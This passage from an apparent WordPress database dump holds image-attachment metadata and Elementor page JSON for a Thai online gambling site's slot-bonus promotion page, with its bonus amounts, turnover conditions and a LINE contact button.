data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1285,155,'_thumbnail_id','53'),(1290,156,'_wp_attached_file','2025/10/Lucky_wheel_-_Megabet333-Biz.webp'),(1291,156,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:41:\"2025/10/Lucky_wheel_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:92842;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Lucky_wheel_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12128;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Lucky_wheel_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:66258;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Lucky_wheel_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Lucky_wheel_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1292,157,'_wp_attached_file','2025/10/79_get_200_7turn_-_Megabet333-Biz.webp'),(1293,157,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:46:\"2025/10/79_get_200_7turn_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:82776;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"79_get_200_7turn_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11910;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"79_get_200_7turn_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:61390;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"79_get_200_7turn_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6842;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:46:\"79_get_200_7turn_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:42528;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1294,158,'_wp_attached_file','2025/10/Free_bonus_100_-_Megabet333-Biz.webp'),(1295,158,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:44:\"2025/10/Free_bonus_100_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:91820;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:44:\"Free_bonus_100_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13060;}s:5:\"large\";a:5:{s:4:\"file\";s:45:\"Free_bonus_100_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:67522;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:44:\"Free_bonus_100_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7608;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:44:\"Free_bonus_100_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:47166;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1296,159,'_wp_attached_file','2025/10/HBD_-_Megabet333-Biz.webp'),(1297,159,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:33:\"2025/10/HBD_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:87478;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"HBD_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12804;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"HBD_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:65118;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"HBD_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7128;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"HBD_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45274;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1298,160,'_wp_attached_file','2025/10/Reward_10_-_Megabet333-Biz.webp'),(1299,160,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:39:\"2025/10/Reward_10_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:88404;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Reward_10_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12932;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"Reward_10_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:66010;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Reward_10_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7328;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Reward_10_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:45120;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1300,161,'_wp_attached_file','2025/10/20_get_100_-_Megabet333-Biz.webp'),(1301,161,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:40:\"2025/10/20_get_100_-_Megabet333-Biz.webp\";s:8:\"filesize\";i:85552;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"20_get_100_-_Megabet333-Biz-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12144;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"20_get_100_-_Megabet333-Biz-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:62108;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"20_get_100_-_Megabet333-Biz-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7236;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"20_get_100_-_Megabet333-Biz-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:43472;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1302,162,'_elementor_edit_mode','builder'),(1303,162,'_elementor_template_type','wp-page'),(1304,162,'_elementor_version','3.32.5'),(1305,162,'_elementor_pro_version','3.32.3'),(1306,162,'_wp_page_template','default'),(1307,162,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1308,162,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas 